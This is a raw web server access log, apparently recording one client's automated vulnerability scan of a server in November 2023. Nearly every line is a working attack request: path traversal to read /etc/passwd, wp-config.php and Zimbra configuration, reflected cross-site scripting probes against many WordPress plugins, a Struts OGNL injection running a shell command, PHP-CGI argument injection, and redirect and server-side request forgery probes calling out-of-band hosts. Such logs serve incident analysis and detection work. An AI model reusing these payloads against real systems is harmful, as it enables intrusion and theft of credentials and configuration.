Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 361 2023-11-09 16:21:03 103.153.214.94 GET /ccmivr/IVRGetAudioFile.do file=../../../../../../../../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 385 2023-11-09 16:22:12 103.153.214.94 GET /wp-content/plugins/flash-album-gallery/facebook.php i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 409 2023-11-09 16:22:23 103.153.214.94 GET /wp-content/plugins/adminimize/adminimize_page.php page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 488 2023-11-09 16:22:29 103.153.214.94 GET /wp-content/plugins/flexible-custom-post-type/edit-post.php id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 440 2023-11-09 16:22:43 103.153.214.94 GET /index.php option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 516 2023-11-09 16:22:51 103.153.214.94 GET /wp-content/plugins/alert-before-your-post/trunk/post_alert.php name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 400 2023-11-09 16:23:03 103.153.214.94 GET /wp-content/plugins/skysa-official/skysa.php submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 387 2023-11-09 16:23:41 103.153.214.94 GET /wp-content/plugins/clickdesk-live-support-chat/clickdesk.php cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 388 2023-11-09 16:23:51 103.153.214.94 GET /wp-content/plugins/advanced-text-widget/readme.txt - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 383 2023-11-09 16:23:56 103.153.214.94 GET /wp-content/plugins/advanced-text-widget/advancedtext.php page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 390 2023-11-09 16:24:22 103.153.214.94 GET /orchard/Users/Account/LogOff ReturnUrl=%2f%2fhttp://interact.sh%3f 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 376 2023-11-09 16:24:26 103.153.214.94 GET /wp-content/plugins/featurific-for-wordpress/cached_image.php snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 1146 2023-11-09 16:25:04 103.153.214.94 GET /devmode.action debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream())) 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 366 2023-11-09 16:25:47 103.153.214.94 GET /portal/displayAPSForm.action debug=command&expression=8410*2244 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 389 2023-11-09 16:26:11 103.153.214.94 GET /wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 377 2023-11-09 16:26:21 103.153.214.94 GET /wp-content/plugins/count-per-day/download.php n=1&f=/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 409 2023-11-09 16:26:50 103.153.214.94 GET /index.php r=i/../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 385 2023-11-09 16:27:02 103.153.214.94 GET /contrib/acog/print_form.php formname=../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 362 2023-11-09 16:27:38 103.153.214.94 GET /document.php modulepart=project&file=../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 376 2023-11-09 16:27:40 103.153.214.94 GET /index.php class=../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 378 2023-11-09 16:27:56 103.153.214.94 GET /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 377 2023-11-09 16:28:08 103.153.214.94 GET / page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 365 2023-11-09 16:28:31 103.153.214.94 POST /index.php -d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 364 2023-11-09 16:29:28 103.153.214.94 GET / page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 376 2023-11-09 16:30:06 103.153.214.94 GET /learn/cubemail/filemanagement.php action=dl&f=../../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 444 2023-11-09 16:30:48 103.153.214.94 GET /wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 477 2023-11-09 16:31:10 103.153.214.94 GET / dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 392 2023-11-09 16:31:27 103.153.214.94 GET /reports/rwservlet/showenv - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 361 2023-11-09 16:31:27 103.153.214.94 GET /controlcenter.php opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 363 2023-11-09 16:31:30 103.153.214.94 GET /reports/rwservlet report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:/// 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 388 2023-11-09 16:31:34 103.153.214.94 GET /fw/syslogViewer.do port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 367 2023-11-09 16:31:51 103.153.214.94 GET /assets/login a=https://interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 403 2023-11-09 16:32:22 103.153.214.94 GET /tiki-featured_link.php type=f&url=https://interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 394 2023-11-09 16:32:52 103.153.214.94 GET /wp-login.php redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 360 2023-11-09 16:32:55 103.153.214.94 GET /awstats/awredir.pl url=%3Cscript%3Ealert(document.domain)%3C/script%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 372 2023-11-09 16:33:00 103.153.214.94 GET /cgi-bin/awstats/awredir.pl url=%3Cscript%3Ealert(document.domain)%3C/script%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 375 2023-11-09 16:33:05 103.153.214.94 POST /wp-content/plugins/age-verification/age-verification.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 376 2023-11-09 16:33:49 103.153.214.94 GET / h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 1133 2023-11-09 16:33:51 103.153.214.94 GET /source/loggin/page_log_dwn_file.hsp h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 358 2023-11-09 16:34:26 103.153.214.94 POST /user.action - 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 405 0 1 376 2023-11-09 16:34:51 103.153.214.94 GET /wp-content/plugins/uploader/views/notify.php notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 369 2023-11-09 16:35:14 103.153.214.94 GET /index.action redirect:http://www.interact.sh/ 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 1133 2023-11-09 16:35:53 103.153.214.94 GET /wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 399 2023-11-09 16:36:29 103.153.214.94 GET /wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 378 2023-11-09 16:36:41 103.153.214.94 GET /wp-content/plugins/duplicator/files/installer.cleanup.php remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 1186 2023-11-09 16:37:23 103.153.214.94 GET /telaen/redir.php https://interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 1748 2023-11-09 16:37:25 103.153.214.94 GET /redir.php https://interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 399 2023-11-09 16:37:44 103.153.214.94 GET /ccmadmin/bulkvivewfilecontents.do filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 406 2023-11-09 16:37:47 103.153.214.94 GET /index.php p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 381 2023-11-09 16:38:35 103.153.214.94 GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php page=%3Cscript%3Ealert(document.domain)%3C/script%3E 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 1248 2023-11-09 16:39:15 103.153.214.94 GET /wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php dew_file=../../../../wp-config.php 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 379 2023-11-09 16:39:32 103.153.214.94 POST / - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 387 2023-11-09 16:40:03 103.153.214.94 GET /web_shell_cmd.gch - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 391 2023-11-09 16:40:10 103.153.214.94 GET /photoalbum/index.php urlancien&url=../../../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 367 2023-11-09 16:40:23 103.153.214.94 POST /webadm/ q=moni_detail.do&action=gragh 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 2199 2023-11-09 16:41:11 103.153.214.94 GET /Portal/Portal.mwsl PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 371 2023-11-09 16:41:12 103.153.214.94 GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx+TemplateMsg.js.zgz v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 376 2023-11-09 16:41:15 103.153.214.94 GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx+TemplateMsg.js.zgz v=091214175450&skin=../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 382 2023-11-09 16:41:52 103.153.214.94 GET /cgi-bin/webproc getpage=/etc/passwd&var:page=deviceinfo 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 393 2023-11-09 16:43:15 103.153.214.94 POST /_search pretty 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 378 2023-11-09 16:43:41 103.153.214.94 POST / q=node&destination=node 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 405 0 1 372 2023-11-09 16:44:58 103.153.214.94 GET /wp-content/plugins/activehelper-livehelp/server/offline.php MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 377 2023-11-09 16:45:16 103.153.214.94 GET /uddiexplorer/SearchPublicRegistries.jsp rdoSearch=name&txtSearchname=sdf&txtSearchkey&txtSearchfor&selfor=Business+location&btnSubmit=Search&operator=http://cl6fbhsfe7k9sg331pogh5obceeityz99.oast.pro 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 389 2023-11-09 16:46:00 103.153.214.94 GET /wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 418 2023-11-09 16:46:09 103.153.214.94 GET /wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 1195 2023-11-09 16:46:13 103.153.214.94 GET /wp-content/plugins/movies/getid3/demos/demo.mimeonly.php filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 438 2023-11-09 16:46:49 103.153.214.94 GET /wp-content/plugins/podcast-channels/getid3/demos/demo.write.php Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 378 2023-11-09 16:47:29 103.153.214.94 GET /wp-content/plugins/shortcode-ninja/preview-shortcode-external.php shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 372 2023-11-09 16:47:35 103.153.214.94 GET /wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E+ 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 394 2023-11-09 16:48:15 103.153.214.94 GET /wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 367 2023-11-09 16:48:36 103.153.214.94 GET /wp-content/plugins/wp-easycart/inc/admin/phpinfo.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 391 2023-11-09 16:48:58 103.153.214.94 GET /wp-content/plugins/tera-charts/charts/zoomabletreemap.php fn=../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 393 2023-11-09 16:49:57 103.153.214.94 GET /webEdition/showTempFile.php file=../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 433 2023-11-09 16:50:11 103.153.214.94 GET /wp-content/plugins/wp-planet/readme.txt - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 387 2023-11-09 16:50:13 103.153.214.94 GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 390 2023-11-09 16:50:47 103.153.214.94 GET /wp-content/plugins/wp-source-control/downloadfiles/download.php path=../../../../wp-config.php 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 372 2023-11-09 16:52:02 103.153.214.94 GET /osclass/oc-admin/index.php page=appearance&action=render&file=../../../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 373 2023-11-09 16:52:06 103.153.214.94 GET / search==%00{.cookie|zCkBBB|value%3dCVE-2014-6287.} 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 374 2023-11-09 16:52:57 103.153.214.94 GET /process/feries.php fichier=../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 371 2023-11-09 16:53:03 103.153.214.94 GET /costModule/faces/javax.faces.resource/web.xml loc=../WEB-INF 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 361 2023-11-09 16:53:06 103.153.214.94 GET /costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf ln=.. 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 361 2023-11-09 16:53:09 103.153.214.94 GET /faces/javax.faces.resource/web.xml loc=../WEB-INF 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 360 2023-11-09 16:53:11 103.153.214.94 GET /faces/javax.faces.resource./WEB-INF/web.xml.jsf ln=.. 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 363 2023-11-09 